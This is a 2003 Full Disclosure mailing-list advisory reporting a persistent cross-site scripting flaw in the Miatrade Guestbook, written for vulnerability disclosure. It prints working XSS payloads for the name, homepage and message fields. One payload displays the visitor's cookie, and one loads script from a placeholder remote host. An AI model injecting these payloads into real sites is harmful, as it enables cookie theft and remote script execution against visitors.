Full Disclosure mailing list archives
Miatrade Guestbook - Persistant XSS
From: "morning_wood" <se_cur_ity () hotmail com>
Date: Sun, 24 Aug 2003 15:12:15 -0700
------------------------------------------------------------------ - EXPL-A-2003-021 exploitlabs.com Advisory 021 ------------------------------------------------------------------ -= Miatrade Guestbook =- Aug 20, 2003 Donnie Werner morning_wood () exploitlabs com Product: -------- Miatrade guestbook http://www.miatrade.com http://www.google.com/keyword/Miatrade+Guestbook Vunerability: ---------------- 1. persistant XSS Description of product: ----------------------- "Miatrade Guestbook gives you the ability to gather information from your visitors. They can post a public message that may include: Name, E-mail, url, Home page and Comments about your site. Miatrade guestbook let's you keep in touch with who's visiting your site and are a great way to make your site more interactive and keep visitors coming back." VUNERABILITY / EXPLOIT ====================== Miatrade guestbook does not filter HTML code from user-supplied input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Miatrade guestbook software and will run in the security context of that site. persistant XSS rendered in fields: [name] - <script>alert("You are vunerable to xss")</script> [homepage] - <script>document.write(document.cookie)</script> [message] - <script language="JavaScript" src="http://someremote-url/nasty.js" type="text/javascript"></script> live examples: demo - sign http://www.miatrade.com/cgi-bin/guest/sign.pl?fibi demo - view http://www.miatrade.com/cgi-bin/guest/view.pl?fibi Local: ------ no Remote: ------- yes Vendor Fix: ----------- No fix on 0day Vendor Contact: --------------- Concurrent with this advisory info () miatrade com Credits: -------- Donnie Werner co-founder / CTO e2-labs.com morning_wood () e2-labs com http://exploitlabs.com http;//nothackers.org/about.php Original advisory at http://exploitlabs.com/files/advisories/EXPL-A-2003-021-miatrade-gb.txt _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Miatrade Guestbook - Persistant XSS morning_wood (Aug 24)
- <Possible follow-ups>
- RE: Miatrade Guestbook - Persistant XSS dev-null (Aug 24)
- Re: RE: Miatrade Guestbook - Persistant XSS Michael Renzmann (Aug 24)
- RE: Miatrade Guestbook - Persistant XSS dev-null (Aug 25)
- Re: RE: Miatrade Guestbook - Persistant XSS Michael Renzmann (Aug 25)
- Re: RE: Miatrade Guestbook - Persistant XSS Knud Erik Højgaard (Aug 26)